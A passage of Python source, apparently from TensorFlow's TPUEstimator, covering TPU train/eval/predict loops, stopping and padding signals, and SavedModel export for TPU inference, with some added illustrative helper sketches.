if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with tf.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with tf.control_dependencies(internal_ops_to_run):
dummy_predict_op = tf.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
        # directly and yields the elements (via a generator) to the call site.
        # So, the outfeed based prediction must be passed to MonitoredSession
        # directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
        #    to form a single invocation. This avoids the issue that we might
        #    trigger multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with tf.control_dependencies(host_ops):
          host_ops = []  # Empty, we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
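# --- Editor's illustrative sketch; not part of the original module. ---
# Minimal wiring of the class above: resolve the TPU cluster, build a
# RunConfig/TPUConfig pair, and construct the estimator with global batch
# sizes that TPUEstimator re-shards per core. The helper name, TPU name,
# model_dir and batch sizes are hypothetical.
def _example_build_tpu_estimator(my_model_fn, tpu_name, model_dir):
  """Hypothetical helper; not used by this module."""
  cluster = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=tpu_name)
  run_config = tpu_config.RunConfig(
      cluster=cluster,
      model_dir=model_dir,
      tpu_config=tpu_config.TPUConfig(iterations_per_loop=100))
  return TPUEstimator(
      model_fn=my_model_fn,
      config=run_config,
      use_tpu=True,
      train_batch_size=1024,  # global batch size; per-core size is derived
      eval_batch_size=1024)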
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and
isinstance(cluster, tf.distribute.cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
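# --- Editor's illustrative sketch; not part of the original module. ---
# The two helpers above are inverses for a given ExportOutput: flatten it into
# a tensor list (e.g. to route through outfeed), then rebuild the same kind of
# ExportOutput from the dequeued tensors. The helper name is hypothetical.
def _example_export_output_round_trip(logits):
  """Hypothetical helper; not used by this module."""
  original = export_output_lib.PredictOutput({'logits': logits})
  tensors = _export_output_to_tensors(original)  # -> [logits]
  return _clone_export_output_with_tensors(original, tensors)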
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
    # replica as an array. As such, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
    # replica as an array. As such, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[tf.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
    # replica as an array. As such, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with tf.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
iterations = tf.identity(iterations_per_loop_var)
return tf.compat.v1.while_loop(
lambda i: i < iterations,
computation, [tf.constant(0)],
parallel_iterations=1)
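# --- Editor's illustrative sketch; not part of the original module. ---
# The wrapper above turns a one-shot op builder into a counted loop that runs
# iterations_per_loop times with parallel_iterations=1, e.g. to drive a group
# of enqueue ops from a host device. The helper name and device string are
# hypothetical.
def _example_repeated_enqueue_loop(enqueue_ops):
  """Hypothetical helper; not used by this module."""
  return _wrap_computation_in_while_loop(
      device='/job:worker/task:0/device:CPU:0',
      op_fn=lambda: [tf.group(*enqueue_ops)])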
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with tf.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
return tf.compat.v1.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph(ctx):
"""Validate graph before running distributed training.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = tf.compat.v1.get_default_graph().get_operations()
  # Check if there is at least one CrossReplicaSum operation in the graph.
  # This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops and ctx.num_replicas > 1:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
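# --- Editor's illustrative sketch; not part of the original module. ---
# The validation above looks for CrossReplicaSum ops, which appear when the
# model_fn wraps its optimizer in CrossShardOptimizer so that gradients are
# aggregated across replicas. The helper name and optimizer choice are
# hypothetical.
def _example_cross_shard_train_op(loss, learning_rate):
  """Hypothetical helper; not used by this module."""
  optimizer = tf.compat.v1.tpu.CrossShardOptimizer(
      tf.compat.v1.train.GradientDescentOptimizer(learning_rate))
  return optimizer.minimize(
      loss, global_step=tf.compat.v1.train.get_global_step())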
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
          'InternalError: Object can capture only once. Please file a bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
          'Please file a bug.')
return self._object
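# --- Editor's illustrative sketch; not part of the original module. ---
# _CapturedObject smuggles a Python object out of a TF control-flow body: the
# body calls capture() exactly once, and code outside the control flow reads
# it back with get(). The helper name is hypothetical.
def _example_captured_object_usage(scaffold_fn):
  """Hypothetical helper; not used by this module."""
  captured = _CapturedObject()
  captured.capture(scaffold_fn)  # inside the control-flow body
  return captured.get()          # afterwards, outside the control flow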
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = tf.compat.v1.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
                         'a bug.')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = tf.compat.v1.data.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
      # We append (2 * num_invocations_per_step - 1) batches to exhaust the
      # user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = tf.compat.v1.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
    Here we change the data structure in the dataset, such that the return value
    is a dictionary with `features`, `labels`, and `signals` as three distinct
    keys. This structure makes it easier to decompose the inputs (see
    `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
        # Unpack the single Tensor/dict argument as features. This is required
        # when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
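# Hedged sketch (not part of the original module): the per-element dictionary
# structure produced by the map fn returned from `insert_stopping_signal` above,
# written with plain Python values instead of Tensors. The feature and label
# values are invented for illustration.
def _demo_stopping_signal_structure():
  element = {
      'features': {'x': [1.0, 2.0]},
      'labels': [0, 1],
      'signals': {'stopping': [[False], [False]]},  # shape [batch_size, 1]
  }
  assert set(element) == {'features', 'labels', 'signals'}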
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = tf.dtypes.bool
if self._stop:
stopping = tf.ones(shape=shape, dtype=dtype)
else:
stopping = tf.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return tf.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, tf.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return tf.math.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
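# Hedged sketch (not part of the original module): the non-Tensor branch of
# `_StopSignals.should_stop`, as exercised from a SessionRunHook where the
# scalar has already been fetched as a plain Python/NumPy bool.
def _demo_should_stop_python_branch():
  assert _StopSignals.should_stop(True) is True
  assert _StopSignals.should_stop(False) is False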
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = tf.compat.v1.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = tf.constant(batch_size, tf.dtypes.int32)
check_greater = tf.compat.v1.debugging.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with tf.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = tf.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = tf.compat.v1.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return tf.nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = tf.compat.v1.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = tf.math.equal(batch_size, tensor.shape[0])
with tf.control_dependencies([check_batch_size]):
return tf.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - tf.math.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
    # As we split the Tensors to all TPU cores and concat them back, it is
    # important to ensure the real data is placed before the padded ones, i.e.,
    # that order is preserved. Given that, the sliced padding mask should be all
    # 0's. If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = tf.math.equal(
tf.math.reduce_sum(sliced_padding_mask), 0)
with tf.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = tf.math.equal(tf.math.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return tf.compat.v1.cond(
tf.math.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return tf.nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in tf.nest.flatten(batch_features) if isinstance(x, tf.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = tf.concat([
tf.zeros((real_batch_size,), dtype=tf.dtypes.int32),
tf.ones((missing_count,), dtype=tf.dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
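# Hedged sketch (not part of the original module): the padding-mask convention
# used by `_PaddingSignals` above, with plain Python lists standing in for
# Tensors. Real rows get 0, padded rows get 1, and slicing off the padded tail
# recovers the real batch.
def _demo_padding_mask():
  real_batch_size, batch_size = 3, 5
  missing_count = batch_size - real_batch_size
  padding_mask = [0] * real_batch_size + [1] * missing_count  # mirrors _padding_mask
  padded_rows = ['a', 'b', 'c', 'pad', 'pad']
  real_rows = padded_rows[:batch_size - sum(padding_mask)]  # mirrors slice_single_tensor
  assert real_rows == ['a', 'b', 'c']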
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
        'consider using Tensors with smaller shapes or reducing the batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
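# Hedged sketch (not part of the original module): `_add_item_to_params` on a
# plain dict, i.e. the branch taken when `params` is not an HParams object. The
# key and value are arbitrary examples.
def _demo_add_item_to_params_dict():
  params = {'learning_rate': 0.01}
  _add_item_to_params(params, 'batch_size', 128)
  assert params == {'learning_rate': 0.01, 'batch_size': 128}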
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(
features,
computation,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = tf.nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = tf.nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
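# Hedged sketch (not part of the original module): the `None`-reinsertion loop
# used above to rebuild the flattened export_outputs list. The indices and
# values are made-up examples.
def _demo_reinsert_nones():
  none_indices = [1, 3]
  flat_without_none = ['a', 'b']
  rebuilt = []
  while none_indices or flat_without_none:
    if none_indices and none_indices[0] == len(rebuilt):
      rebuilt.append(None)
      none_indices.pop(0)
    else:
      rebuilt.append(flat_without_none.pop(0))
  assert rebuilt == ['a', None, 'b', None]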
def _build_computation_for_inference(model_fn,
labels,
config,
params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tf.compat.v1.tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
